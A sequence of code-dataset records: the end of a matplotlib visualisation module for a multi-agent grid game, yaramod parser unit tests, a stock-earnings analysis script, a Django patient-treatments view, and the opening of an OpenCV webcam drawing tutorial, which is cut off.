outer.update(left=0.01, right=0.99, top=0.95, bottom=0.01)\n\n # Plot overview (and information box) on the left side\n self._plot_overview(fig, outer[0], time_step=time_step, plot_agent_status=plot_agent_status,\n plot_path=plot_path, plot_info=plot_info, title=overview_title)\n\n # Define titles of the small maps\n if self._next_step:\n nr_maps = 6\n maps_names = ['Obstacles', 'Aim', 'Agent\\'s\\nCurrent Pos.', 'Agent\\'s\\nNext Pos.',\n 'Others\\nCurrent Pos.', 'Others\\nNext Pos.']\n else:\n nr_maps = 4\n maps_names = ['Obstacles', 'Aim', 'Agent\\'s\\nPosition', 'Others\\nPosition']\n if plot_input:\n nr_maps += 2\n maps_names.append('Full Map\\nNet Input')\n maps_names.append('Reduced\\nNet Input')\n\n # Create the right grid for the small maps\n agents_grid = gridspec.GridSpecFromSubplotSpec(self._agent_count, nr_maps, subplot_spec=outer[1],\n wspace=0.1, hspace=0.1)\n\n # Plot small maps\n for i_agent in range(self._agent_count):\n maps = self.get_maps_for_agent(time_step=time_step, agent=i_agent, plot_input=plot_input)\n for i_map, map_ in enumerate(maps):\n i_grid = i_agent * 
nr_maps + i_map\n                ax = plt.Subplot(fig, agents_grid[i_grid])\n                if plot_input and i_map + 2 >= nr_maps:\n                    self._plot_heatmap(ax, map_)\n                else:\n                    color = self._get_plot_color(i_agent)\n                    if self._view_reduced:\n                        self._plot_map(ax, map_, color, plot_view_field=True,\n                                       curr_pos=self._current_pos[time_step, i_agent])\n                    else:\n                        self._plot_map(ax, map_, color)\n\n                # add map titles\n                if ax.is_first_row():\n                    ax.set_xlabel(maps_names[i_map], fontsize=15)\n                    ax.xaxis.set_label_position('top')\n\n                # add agent titles\n                if ax.is_first_col():\n                    ax.set_ylabel('Agent {}'.format(i_agent), fontsize=15)\n\n                fig.add_subplot(ax)\n\n        plt.subplots_adjust(wspace=0, hspace=0)\n\n        return fig\n\n    def plot_map(self, map_, block=True, save_as=None):\n        # It's a wrapper method of _plot_map()\n        \"\"\"\n        Shows a boolean map\n        :param map_: boolean map to plot\n        :param block: blocking behavior of plt.show(block=...)\n        :param save_as: string of path if plot should be saved instead of displayed\n        :return:\n        \"\"\"\n        # Disable tools and create figure and axes\n        mpl.rcParams['toolbar'] = 'None'\n        fig, ax = plt.subplots(1, figsize=(5, 5))\n\n        # Plot map\n        self._plot_map(ax, map_, 'black')\n\n        # Save or show plot\n        if save_as:\n            fig.savefig(save_as)\n            plt.close(fig)\n        else:\n            plt.show(block=block)\n\n    def plot_overview(self, time_step=-1, plot_agent_status=True, plot_path=True, plot_info=False,\n                      block=True, save=False):\n        # It's a wrapper method of _plot_overview()\n        \"\"\"\n        Plot a map with all agents included\n        :param time_step: time step to be plotted\n        :param plot_agent_status: plot agents status (not implemented yet)\n        :param plot_path: plot a line from start via each step to the current position\n        :param plot_info: plot some information below the map\n        :param block: blocking behavior of plt.show(block=...)\n        :param save: if true save plot at viz/... instead of displaying\n        :return:\n        \"\"\"\n        if time_step == -1:\n            time_step = self.time_steps - 1\n\n        # Disable tools and create figure and axes\n        mpl.rcParams['toolbar'] = 'None'\n        img_width = 1080\n        img_height = 1080\n        dpi = 120\n        fig = plt.figure(figsize=(img_width / dpi, img_height / dpi), dpi=dpi)\n\n        # Plot overview\n        self._plot_overview(fig, time_step=time_step, plot_agent_status=plot_agent_status, plot_path=plot_path,\n                            plot_info=plot_info)\n        fig.set_size_inches(img_width / dpi, img_height / dpi)\n\n        # Save or show plot\n        if save:\n            directory = os.path.join('viz', self._dt, 'overview')\n\n            # Check if directory for images exists\n            if not os.path.exists(directory):\n                os.makedirs(directory)\n\n            file_name = f'{self._dt}_game_{self._i_game}_time_{time_step}_overview.png'\n            fig.savefig(os.path.join(directory, file_name), dpi=dpi)\n            plt.close(fig)  # can crash Python if this method is executed too often in a short time :-(\n        else:\n            plt.show(block=block)\n\n    def plot_all(self, time_step=-1, plot_agent_status=True, plot_path=True, plot_input=False, plot_info=False,\n                 block=True, save=False):\n        # It's a wrapper method of _plot_all()\n        \"\"\"\n        Plot a visualisation with a big overview map and\n        small maps for all agents for all types of object in the environment\n        :param time_step: time step to be plotted\n        :param plot_agent_status: plot agents status (not implemented yet)\n        :param plot_path: plot a line from start via each step to the current position\n        :param plot_input: show also heatmaps to visualize network input\n        :param plot_info: plot some information below the overview map\n        :param block: blocking behavior of plt.show(block=...)\n        :param save: if true save plot at viz/... instead of displaying\n        :return:\n        \"\"\"\n        if time_step == -1:\n            time_step = self.time_steps - 1\n\n        # Disable tools and create figure, axes and outer grid\n        mpl.rcParams['toolbar'] = 'None'\n        img_width = 1920\n        img_height = 1080\n        dpi = 120\n        fig = plt.figure(figsize=(img_width / dpi, img_height / dpi), dpi=dpi)\n\n        # Plot all\n        fig = self._plot_all(fig, time_step=time_step, plot_agent_status=plot_agent_status,\n                             plot_path=plot_path, plot_input=plot_input, plot_info=plot_info)\n        fig.set_size_inches(img_width / dpi, img_height / dpi)\n\n        # Save or show plot\n        if save:\n            directory = os.path.join('viz', self._dt, 'all')\n\n            # Check if directory for images exists\n            if not os.path.exists(directory):\n                os.makedirs(directory)\n\n            file_name = f'{self._dt}_game_{self._i_game}_time_{time_step}_all.png'\n            fig.savefig(os.path.join(directory, file_name), dpi=dpi)\n            plt.close(fig)  # can crash Python if this method is executed too often in a short time :-(\n        else:\n            plt.show(block=block)\n\n    def generate_mp4(self, kind, plot_agent_status=True, plot_path=True, plot_input=False, plot_info=True):\n        \"\"\"\n        Generate and save an mp4 video of the desired kind of plot over all time steps\n        :param kind: kind of plot as string ('all' or 'overview')\n        :param plot_agent_status: plot agents status (not implemented yet)\n        :param plot_path: plot a line from start via each step to the current position\n        :param plot_input: show also heatmaps to visualize network input\n        :param plot_info: plot some information below the overview map\n        \"\"\"\n        plot_func = None\n        img_width = 1920\n        img_height = 1080\n        dpi = 120\n\n        # Get the right plot function depending on the desired kind of plot\n        if kind == 'all':\n            plot_func = self._plot_all\n        elif kind == 'overview':\n            plot_func = self._plot_overview\n            img_height = 1080\n            img_width = 1080  # 900\n\n        plt.ioff()  # prevent matplotlib from running out of memory\n\n        def draw_frame(ts):\n            fig = plt.figure(figsize=(img_width / dpi, img_height / dpi), dpi=dpi)\n            fig = plot_func(fig, time_step=ts, plot_agent_status=plot_agent_status, plot_path=plot_path,\n                            plot_input=plot_input, plot_info=plot_info)\n            fig.set_size_inches(img_width / dpi, img_height / dpi)\n            data = fig_to_data(fig)\n            # fig.clf()\n            # plt.clf()\n            plt.close(fig)\n            return data\n\n        # # Make the pool of workers  # TODO: multithreading\n        # pool = mp.ProcessingPool(mp.cpu_count() - 1)\n        # # Start multithreading\n        # frame_array = list(tqdm(pool.imap(draw_frame, np.arange(self.time_steps)), total=self.time_steps))\n        frame_array = [draw_frame(ts) for ts in tqdm(range(self.time_steps))]\n\n        # # Close the pool and wait for the work to finish  # TODO: multithreading\n        # pool.close()\n        # pool.join()\n\n        directory = os.path.join('viz', self._dt, kind)\n\n        # Check if directory for images exists\n        if not os.path.exists(directory):\n            os.makedirs(directory)\n\n        file_name = f'{self._dt}_game_{self._i_game}_{kind}.mp4'\n\n        # Generate video\n        w = imageio.get_writer(os.path.join(directory, file_name),\n                               fps=4, quality=6, macro_block_size=20)\n        for i in range(len(frame_array)):\n            w.append_data(frame_array[i])\n        w.close()\n\n        # Add entry to a text file including all videos of a run\n        # You can use ffmpeg to concatenate videos of a run:\n        # ffmpeg -f concat -safe 0 -i mylist.txt -c copy output.mp4\n        # https://stackoverflow.com/a/11175851/7439335\n        open(os.path.join(directory, 'videos.txt'), \"a\").write(f\"file '{file_name}'\\n\")\n\n    def save(self):\n        \"\"\"\n        Save Visualisation object at viz/...\n        :return:\n        \"\"\"\n        directory = os.path.join('viz', 
self._dt, 'obj')\n\n # Check if directory for viz exists\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n # Save\n f = open(os.path.join(directory, f'{self._dt}_game_{self._i_game}.viz'), 'wb')\n pickle.dump(self, f, 2)\n f.close()\n\n @staticmethod\n def load(path):\n \"\"\"\n Load Visualisation object from file\n :param path: path of saved Visualisation object\n :return:\n \"\"\"\n f = open(path, 'rb')\n viz = pickle.load(f)\n f.close()\n return viz\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Visualize Environment')\n parser.add_argument(\"-f\", \"--file_path\", type=str,\n help=\"define path to .viz file\")\n args = parser.parse_args()\n\n viz = Visualisation.load(args.file_path)\n viz._color_hue_offset = 0.3\n viz.generate_mp4('all', plot_input=True, plot_info=False)\n","repo_name":"sebastiansze/DL-Project","sub_path":"visualisation.py","file_name":"visualisation.py","file_ext":"py","file_size_in_byte":32988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25163639045","text":"import unittest\nimport yaramod\n\n\nclass RepresentationTests(unittest.TestCase):\n def test_literals(self):\n int_lit = yaramod.Literal(42)\n self.assertTrue(int_lit.is_int)\n self.assertEqual(int_lit.int, 42)\n self.assertEqual(int_lit.uint, 42)\n self.assertEqual(int_lit.text, '42')\n\n hex_int_lit = yaramod.Literal(42, '0x2A')\n self.assertTrue(hex_int_lit.is_int)\n self.assertEqual(hex_int_lit.int, 42)\n self.assertEqual(hex_int_lit.uint, 42)\n self.assertEqual(hex_int_lit.text, '0x2A')\n\n str_lit = yaramod.Literal('hello')\n self.assertTrue(str_lit.is_string)\n self.assertEqual(str_lit.string, 'hello')\n self.assertEqual(str_lit.text, '\"hello\"')\n\n bool_lit = yaramod.Literal(True)\n self.assertTrue(bool_lit.is_bool)\n self.assertEqual(bool_lit.bool, True)\n self.assertEqual(bool_lit.text, 'true')\n\n def test_change_meta_of_rule(self):\n yara_file = yaramod.Yaramod().parse_string('''\nrule empty_rule {\n\tmeta:\n\t\tkey = \"value\"\n\tcondition:\n\t\ttrue\n}''')\n\n self.assertEqual(len(yara_file.rules), 1)\n\n rule = yara_file.rules[0]\n rule.metas[0].value = yaramod.Literal('another value')\n\n expected = '''\nrule empty_rule\n{\n\tmeta:\n\t\tkey = \"another value\"\n\tcondition:\n\t\ttrue\n}\n'''\n self.assertEqual(expected, yara_file.text_formatted)\n\n def test_get_string_modifiers(self):\n yara_file = yaramod.Yaramod().parse_string('''\nrule rule_with_string_modifiers {\n\tstrings:\n\t\t$00 = \"value\" ascii wide fullword\n\tcondition:\n\t\tall of them\n}''')\n\n self.assertEqual(len(yara_file.rules), 1)\n self.assertEqual(len(yara_file.rules[0].strings[0].modifiers), 3)\n\n # Order of modifiers is not guaranteed\n string = yara_file.rules[0].strings[0]\n expected_modifiers = {\n yaramod.FullwordStringModifier,\n yaramod.WideStringModifier,\n yaramod.AsciiStringModifier,\n }\n\n for modifier in string.modifiers:\n assert type(modifier) in expected_modifiers\n expected_modifiers.remove(type(modifier))\n\n assert len(expected_modifiers) == 0\n\n def test_remove_string_modifiers(self):\n yara_file = yaramod.Yaramod().parse_string('''\nrule rule_with_string_modifiers {\n\tstrings:\n\t\t$00 = \"value\" ascii wide fullword\n\tcondition:\n\t\tall of them\n}''')\n\n self.assertEqual(len(yara_file.rules), 1)\n self.assertEqual(len(yara_file.rules[0].strings[0].modifiers), 3)\n\n rule = yara_file.rules[0]\n rule.strings[0].remove_modifiers()\n\n expected = '''\nrule 
rule_with_string_modifiers\n{\n\tstrings:\n\t\t$00 = \"value\"\n\tcondition:\n\t\tall of them\n}\n'''\n self.assertEqual(len(rule.strings[0].modifiers), 0)\n self.assertEqual(expected, yara_file.text_formatted)\n\n def test_get_tokenstream(self):\n yara_file = yaramod.Yaramod().parse_string('''\nrule empty_rule {\n meta:\n key = \"value\"\n condition:\n true\n}''')\n\n self.assertEqual(len(yara_file.rules), 1)\n\n rule = yara_file.rules[0]\n rule.metas[0].value = yaramod.Literal('another value')\n\n ts = yara_file.tokenstream\n self.assertFalse(ts.empty)\n self.assertEqual(ts.front.pure_text, '\\n')\n self.assertEqual(ts.back.pure_text, '}')\n self.assertEqual(ts.tokens_as_text, [ '\\n',\n 'rule', 'empty_rule', '{', '\\n',\n 'meta', ':', '\\n',\n 'key', '=', 'another value', '\\n',\n 'condition', ':', '\\n', 'true', '\\n',\n '}'\n ])\n condition_ts = rule.condition.tokenstream\n self.assertEqual(condition_ts.tokens_as_text, [ '\\n',\n 'rule', 'empty_rule', '{', '\\n',\n 'meta', ':', '\\n',\n 'key', '=', 'another value', '\\n',\n 'condition', ':', '\\n', 'true', '\\n',\n '}'\n ])\n\n def test_get_tokenstream_after_syntax_error_1(self):\n input_text = '''\nrule dummy_rule {\n\tcondition\n\t\ttrue\n}'''\n ymod = yaramod.Yaramod()\n try:\n ymod.parse_string(input_text)\n except:\n ts = ymod.yara_file.tokenstream\n self.assertFalse(ts.empty)\n self.assertEqual(ts.front.pure_text, '\\n')\n self.assertEqual(ts.back.pure_text, 'true')\n\n def test_get_tokenstream_after_syntax_error_2(self):\n input_text = '''\nrule dummy_rule {\n\tcondition:\n\t\ttrue ) and false\n}'''\n ymod = yaramod.Yaramod()\n try:\n ymod.parse_string(input_text)\n except:\n ts = ymod.yara_file.tokenstream\n self.assertFalse(ts.empty)\n self.assertEqual(ts.front.pure_text, '\\n')\n self.assertEqual(ts.back.pure_text, ')')\n\n def test_get_tokenstream_after_unknown_identifier_error(self):\n input_text = '''\nrule dummy_rule {\n\tcondition:\n\t\tblah or true\n}'''\n ymod = yaramod.Yaramod()\n try:\n ymod.parse_string(input_text)\n except:\n ts = ymod.yara_file.tokenstream\n self.assertFalse(ts.empty)\n self.assertEqual(ts.front.pure_text, '\\n')\n # After 'blah', also 'or' got into TS, because 'blah' is not tested by the grammar, it is semantics issue\n self.assertEqual(ts.back.pure_text, 'or')\n\n def test_get_tokenstream_after_unknown_module_error(self):\n input_text = '''\nimport \"unknown\"\n\nrule dummy_rule {\n\tcondition:\n\t\ttrue\n}'''\n ymod = yaramod.Yaramod()\n try:\n ymod.parse_string(input_text)\n except:\n ts = ymod.yara_file.tokenstream\n self.assertFalse(ts.empty)\n # After 'unknown', also 'rule' got into TS, because 'unknown' is not tested by the grammar, it is semantics issue\n self.assertEqual(ts.tokens_as_text, [ '\\n',\n 'import', 'unknown', '\\n',\n '\\n',\n 'rule'\n ])\n\n def test_meta_values_interface(self):\n input_text = \"\"\"rule test {\n meta:\n author = \"Name Surname\"\n description = \"Test checking the meta value tokens\"\n condition:\n false\n}\n\"\"\"\n ymod = yaramod.Yaramod()\n yfile = ymod.parse_string(input_text)\n self.assertEqual(len(yfile.rules[0].metas), 2)\n\n meta = yfile.rules[0].metas[0] # author\n self.assertTrue(hasattr(meta, \"token_key\"))\n token = meta.token_key\n self.assertEqual(token.location.begin.line, 3)\n self.assertEqual(token.location.begin.column, 9)\n self.assertEqual(token.location.end.line, 3)\n self.assertEqual(token.location.end.column, 14)\n\n self.assertTrue(hasattr(meta, \"token_value\"))\n token = meta.token_value\n 
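# \"Name Surname\" is 14 characters including the quotes, so the value token spans columns 18-31 on line 3\n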
self.assertEqual(token.location.begin.line, 3)\n self.assertEqual(token.location.begin.column, 18)\n self.assertEqual(token.location.end.line, 3)\n self.assertEqual(token.location.end.column, 31)\n\n meta = yfile.rules[0].metas[1] # description\n self.assertTrue(hasattr(meta, \"token_key\"))\n token = meta.token_key\n self.assertEqual(token.location.begin.line, 4)\n self.assertEqual(token.location.begin.column, 9)\n self.assertEqual(token.location.end.line, 4)\n self.assertEqual(token.location.end.column, 19)\n\n self.assertTrue(hasattr(meta, \"token_value\"))\n token = meta.token_value\n self.assertEqual(token.location.begin.line, 4)\n self.assertEqual(token.location.begin.column, 23)\n self.assertEqual(token.location.end.line, 4)\n self.assertEqual(token.location.end.column, 59)\n\n def test_get_modulepool(self):\n ymod = yaramod.Yaramod()\n modules = ymod.modules\n self.assertTrue(\"cuckoo\" in modules)\n self.assertTrue(\"dex\" in modules)\n self.assertTrue(\"dotnet\" in modules)\n self.assertTrue(\"elf\" in modules)\n self.assertTrue(\"hash\" in modules)\n self.assertTrue(\"macho\" in modules)\n self.assertTrue(\"magic\" in modules)\n self.assertTrue(\"math\" in modules)\n self.assertTrue(\"pe\" in modules)\n self.assertTrue(\"time\" in modules)\n\n def test_module_interface(self):\n modules = yaramod.Yaramod().modules\n\n # module cuckoo\n self.assertTrue(\"cuckoo\" in modules)\n cuckoo_symbol = modules[\"cuckoo\"].structure\n self.assertEqual(\"cuckoo\", cuckoo_symbol.name)\n self.assertTrue(cuckoo_symbol.is_structure)\n cuckoo_attributes = cuckoo_symbol.attributes\n\n self.assertTrue(\"network\" in cuckoo_attributes)\n network_symbol = cuckoo_attributes[\"network\"]\n self.assertTrue(network_symbol.is_structure)\n network_attributes = network_symbol.attributes\n\n self.assertTrue(\"http_get\" in network_attributes)\n http_get_symbol = network_attributes[\"http_get\"]\n self.assertTrue(http_get_symbol.is_function)\n self.assertEqual(\"http_get\", http_get_symbol.name)\n self.assertEqual(http_get_symbol.return_type, yaramod.ExpressionType.Int)\n http_get_overloads = http_get_symbol.overloads\n self.assertEqual(len(http_get_overloads), 1)\n self.assertEqual(http_get_overloads[0], [yaramod.ExpressionType.Regexp])\n\n # module pe\n self.assertTrue(\"pe\" in modules)\n pe_symbol = modules[\"pe\"].structure\n self.assertEqual(\"pe\", pe_symbol.name)\n self.assertTrue(pe_symbol.is_structure)\n pe_attributes = pe_symbol.attributes\n\n self.assertTrue(\"MACHINE_UNKNOWN\" in pe_attributes)\n machine_symbol = pe_attributes[\"MACHINE_UNKNOWN\"]\n self.assertTrue(machine_symbol.is_value)\n self.assertEqual(machine_symbol.data_type, yaramod.ExpressionType.Int)\n\n self.assertTrue(\"version_info\" in pe_attributes)\n version_info_symbol = pe_attributes[\"version_info\"]\n self.assertEqual(version_info_symbol.documentation[0:10], \"Dictionary\")\n\n self.assertTrue(\"sections\" in pe_attributes)\n section_array_symbol = pe_attributes['sections']\n self.assertEqual(section_array_symbol.name, 'sections')\n self.assertTrue(section_array_symbol.is_array)\n self.assertEqual(section_array_symbol.element_type, yaramod.ExpressionType.Object)\n self.assertEqual(section_array_symbol.documentation[0:10], 'Individual')\n section_symbol = section_array_symbol.structure\n self.assertEqual(section_symbol.name, 'sections')\n self.assertTrue(section_symbol.is_structure)\n section_attributes = section_symbol.attributes\n\n self.assertTrue(\"characteristics\" in section_attributes)\n\n def 
test_custom_module_interface(self):\n modules = yaramod.Yaramod(yaramod.Features.AllCurrent, \"./tests/python/testing_modules\").modules\n\n # module module_test\n self.assertTrue(\"module_test\" in modules)\n module_symbol = modules[\"module_test\"].structure\n self.assertEqual(\"module_test\", module_symbol.name)\n self.assertTrue(module_symbol.is_structure)\n cuckoo_attributes = module_symbol.attributes\n\n self.assertTrue(\"structure_test\" in cuckoo_attributes)\n structure_symbol = cuckoo_attributes[\"structure_test\"]\n self.assertTrue(structure_symbol.is_structure)\n structure_attributes = structure_symbol.attributes\n\n self.assertTrue(\"function_test\" in structure_attributes)\n function_symbol = structure_attributes[\"function_test\"]\n self.assertTrue(function_symbol.is_function)\n self.assertEqual(function_symbol.return_type, yaramod.ExpressionType.String)\n function_overloads = function_symbol.overloads\n self.assertEqual(len(function_overloads), 2)\n self.assertEqual(function_overloads[0], [yaramod.ExpressionType.Regexp])\n self.assertEqual(function_overloads[1], [yaramod.ExpressionType.Regexp, yaramod.ExpressionType.String])\n function_documentations = function_symbol.documentations\n print(function_documentations)\n self.assertEqual(len(function_documentations), 2)\n self.assertEqual(function_documentations[0], \"Testing function overload documentation.\")\n self.assertEqual(function_documentations[1], \"Testing function cool overload documentation.\")\n\n self.assertTrue(\"value_test\" in cuckoo_attributes)\n value_symbol = cuckoo_attributes[\"value_test\"]\n self.assertTrue(value_symbol.is_value)\n self.assertEqual(value_symbol.documentation, \"Testing value documentation. Example: ```module_test.value_test > 10```\")\n\n self.assertTrue(\"reference_test\" in cuckoo_attributes)\n reference_symbol = cuckoo_attributes[\"reference_test\"]\n self.assertTrue(reference_symbol.is_reference)\n self.assertEqual(reference_symbol.symbol, structure_symbol)\n\n self.assertTrue(\"references_test\" in cuckoo_attributes)\n references_symbol = cuckoo_attributes[\"references_test\"]\n self.assertTrue(references_symbol.is_array)\n self.assertTrue(references_symbol.structure.is_reference)\n self.assertEqual(references_symbol.structure.symbol, structure_symbol)\n\n def test_custom_module_enhancing_known_module(self):\n modules = yaramod.Yaramod(yaramod.Features.AllCurrent, \"./tests/python/testing_modules\").modules\n\n # module cuckoo\n self.assertTrue(\"cuckoo\" in modules)\n cuckoo_symbol = modules[\"cuckoo\"].structure\n self.assertEqual(\"cuckoo\", cuckoo_symbol.name)\n self.assertTrue(cuckoo_symbol.is_structure)\n cuckoo_attributes = cuckoo_symbol.attributes\n\n # module pe - added of an overload\n self.assertTrue(\"pe\" in modules)\n pe_symbol = modules[\"pe\"].structure\n self.assertEqual(\"pe\", pe_symbol.name)\n pe_attributes = pe_symbol.attributes\n\n # other pe json does not delete functions from base pe json:\n self.assertTrue(\"MACHINE_AM33\" in pe_attributes)\n machine_symbol = pe_attributes[\"MACHINE_AM33\"]\n self.assertTrue(machine_symbol.is_value)\n self.assertEqual(machine_symbol.data_type, yaramod.ExpressionType.Int)\n\n # no problem with multiple definitions of the same symbol if those definitions are compatible:\n self.assertTrue(\"MACHINE_TEST_VALUE\" in pe_attributes)\n machine_symbol = pe_attributes[\"MACHINE_TEST_VALUE\"]\n self.assertTrue(machine_symbol.is_value)\n self.assertEqual(machine_symbol.data_type, yaramod.ExpressionType.Int)\n\n 
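# symbols from the base pe module and the custom JSON are merged, so the original attributes checked below remain available alongside the added ones\n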
self.assertTrue(\"sections\" in pe_attributes)\n section_array_symbol = pe_attributes['sections']\n self.assertEqual(section_array_symbol.name, 'sections')\n self.assertTrue(section_array_symbol.is_array)\n self.assertEqual(section_array_symbol.element_type, yaramod.ExpressionType.Object)\n self.assertEqual(section_array_symbol.documentation[0:10], 'Individual')\n section_symbol = section_array_symbol.structure\n self.assertEqual(section_symbol.name, 'sections')\n self.assertTrue(section_symbol.is_structure)\n section_attributes = section_symbol.attributes\n\n # pe.sections.characteristics still exists:\n self.assertTrue(\"virtual_address\" in section_attributes)\n # pe.sections.test_sections_value is added:\n self.assertTrue(\"test_sections_value\" in section_attributes)\n test_section_value_symbol = section_attributes['test_sections_value']\n self.assertEqual(test_section_value_symbol.name, 'test_sections_value')\n self.assertTrue(test_section_value_symbol.is_value)\n self.assertTrue(test_section_value_symbol.data_type, yaramod.ExpressionType.String)\n\n self.assertTrue(\"rich_signature\" in pe_attributes)\n rich_signature_symbol = pe_attributes['rich_signature']\n self.assertTrue(rich_signature_symbol.is_structure)\n rich_signature_attributes = rich_signature_symbol.attributes\n\n self.assertTrue(\"test_value\" in rich_signature_attributes)\n self.assertTrue(\"version\" in rich_signature_attributes)\n version_symbol = rich_signature_attributes['version']\n self.assertTrue(version_symbol.is_function)\n version_overloads = version_symbol.overloads\n self.assertEqual(len(version_overloads), 3)\n self.assertEqual(version_overloads[0], [yaramod.ExpressionType.Int])\n self.assertEqual(version_overloads[1], [yaramod.ExpressionType.Int, yaramod.ExpressionType.Int])\n self.assertEqual(version_overloads[2], [yaramod.ExpressionType.Int, yaramod.ExpressionType.String])\n version_overloads_names = version_symbol.argument_names\n self.assertEqual(version_overloads_names[0], [\"version\"])\n self.assertEqual(version_overloads_names[1], [\"version\", \"toolid\"])\n self.assertEqual(version_overloads_names[2], [\"version\", \"test string argument\"])\n\n def test_set_tags_to_empty_list_on_a_rule_without_tags(self):\n yara_file = yaramod.Yaramod().parse_string('''rule empty_rule\n{\n\tcondition:\n\t\ttrue\n}''')\n yara_file.rules[0].tags = []\n\n expected = '''rule empty_rule\n{\n\tcondition:\n\t\ttrue\n}\n'''\n self.assertEqual(expected, yara_file.text_formatted)\n\n def test_set_tags_to_empty_list(self):\n yara_file = yaramod.Yaramod().parse_string('''rule empty_rule : test \n{\n\tcondition:\n\t\ttrue\n}''')\n yara_file.rules[0].tags = []\n\n expected = '''rule empty_rule\n{\n\tcondition:\n\t\ttrue\n}\n'''\n self.assertEqual(expected, yara_file.text_formatted)\n\n def test_set_tags_on_a_rule_without_tags(self):\n yara_file = yaramod.Yaramod().parse_string('''rule empty_rule\n{\n\tcondition:\n\t\ttrue\n}''')\n yara_file.rules[0].tags = ['foo', 'bar']\n\n expected = '''rule empty_rule : foo bar\n{\n\tcondition:\n\t\ttrue\n}\n'''\n self.assertEqual(expected, yara_file.text_formatted)\n\n def test_set_tags_on_a_rule_with_tags(self):\n yara_file = yaramod.Yaramod().parse_string('''rule empty_rule : baz\n{\n\tcondition:\n\t\ttrue\n}''')\n yara_file.rules[0].tags = ['foo', 'bar']\n\n expected = '''rule empty_rule : foo bar\n{\n\tcondition:\n\t\ttrue\n}\n'''\n self.assertEqual(expected, 
yara_file.text_formatted)\n","repo_name":"avast/yaramod","sub_path":"tests/python/test_representation.py","file_name":"test_representation.py","file_ext":"py","file_size_in_byte":18106,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"7"} +{"seq_id":"42995686857","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 19 23:31:42 2020\n\n@author: shufe\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 3 20:51:51 2020\n\n@author: shufe\n\"\"\"\n\nfrom build_model import concat_earning, model_ret, get_before_after_run,get_intra_price\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom multiprocessing import Pool, cpu_count\nimport os\n\n#earning = concat_earning(3)\nearning = pd.read_csv('earning_all.csv',index_col = 0, parse_dates = True)\nind = earning.index.unique()\nearning = earning.loc[ind[:2]]\n\n\ndef add_prop(row):\n print ('starting task %s'%str(os.getpid()))\n ticker = row['symbol']\n date = row.name.date()\n timing = row['timing']\n try:\n p = get_before_after_run(ticker,date,timing)\n #intra = get_intra_price(ticker,date,timing)\n row.set_value('before',p[0])\n row.set_value('after',p[1])\n row.set_value('close',p[2])\n row.set_value('spy_before',p[3])\n row.set_value('spy_after',p[4])\n row.set_value('cons',p[5])\n row.set_value('beta',p[6])\n row.set_value('r2',p[7])\n row.set_value('dev',p[8])\n row.set_value('macd_before',p[9])\n row.set_value('macd_after',p[10])\n #row.set_value('open_2d',p[11])\n return row\n except:\n return\n\ndef generate_input(earning):\n agg_df = []\n p = Pool(15)\n for i, row in earning.iterrows():\n temp = p.apply_async(add_prop,args = (row,))\n agg_df.append(temp)\n p.close()\n p.join()\n agg_df = [x.get() for x in agg_df]\n agg_df = [x for x in agg_df if type(x) != type(None)]\n df = pd.DataFrame(agg_df)\n df = df.sort_index(ascending = False)\n df.to_csv('earning_run_price.csv')\n \nif __name__ == '__main__':\n agg_df = []\n p = Pool(15)\n for i, row in earning.iterrows():\n temp = p.apply_async(add_prop,args = (row,))\n agg_df.append(temp)\n p.close()\n p.join()\n agg_df = [x.get() for x in agg_df]\n agg_df = [x for x in agg_df if type(x) != type(None)]\n df = pd.DataFrame(agg_df)\n df = df.sort_index(ascending = False)\n df.to_csv('earning_run_price.csv')\n \n\n\n\n\n\n\n\n\n","repo_name":"ShallweXiaowei/strats","sub_path":"analysis_run.py","file_name":"analysis_run.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"4990433334","text":"from django.views.generic.detail import DetailView\nfrom login_signup.models.customUser import CustomUser\nfrom login_signup.models.prescription import Prescription\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.utils.decorators import method_decorator\n\ndecorators = [\n permission_required('login_signup.can_use_medical_stuff', raise_exception=True),\n login_required(login_url='login')\n]\n\n\n@method_decorator(decorators, name='dispatch')\nclass PatientTreatmentsView(DetailView):\n model = CustomUser\n template_name = 'home/patient/patient_treatments.html'\n context_object_name = 'patient'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n treatments = self.object.treatments.all()\n treatments = [treatment.name for treatment in treatments]\n prescriptions = Prescription.objects.filter(user=self.object)\n prescriptionDisease = 
[treatment.treatment.name for treatment in prescriptions]\n        for treatment in prescriptionDisease:\n            treatments.append(treatment)\n        # transform list of treatments into a set to remove duplicates\n        treatments = set(treatments)\n        print(treatments)\n        context['treatments'] = treatments\n        return context\n","repo_name":"Redshark61/mon-carnet-de-sante","sub_path":"health_book/home/views/patient/patientTreatmentsView.py","file_name":"patientTreatmentsView.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"5628945185","text":"import cv2\nimport numpy as np\n\n# capture video from camera\n\"\"\"\nTo capture a video, you need to create a VideoCapture object. Its argument can be either the device index or the name of a video file\neg: cv2.VideoCapture(0) or cv2.VideoCapture(\"filename.extension\")\n\"\"\"\n\n# creates a VideoCapture object\ncap = cv2.VideoCapture(0)\n\n# if there is no video or the camera doesn't open up, print a message and exit\nif not cap.isOpened():\n    print(\"Cannot open camera\")\n    exit()\n\n# we are creating an infinite loop to capture the video continuously\n\"\"\"\ncap.read() returns two values one is the image/frame which is a numpy array and another is a boolean value (True/False). If the frame is read correctly, it will be True else False\n\"\"\"\n\nwhile True:\n    ret, frame = cap.read()\n\n    # if frame is read correctly ret is True\n    if not ret:\n        print(\"Can't receive frame.\")\n        break\n\n    \"\"\"\n    Note: In OpenCV the color is in BGR (BLUE, GREEN, RED) format\n    \"\"\"\n\n    # draw a diagonal line\n    \"\"\"\n    Blue line with thickness of 5 px\n    (image, starting point, end point, color, thickness)\n    \"\"\"\n    cv2.line(frame,(0,0),(511,511),(255,0,0),5)\n\n    # draw rectangle\n    \"\"\"\n    To draw a rectangle, you need top-left corner and 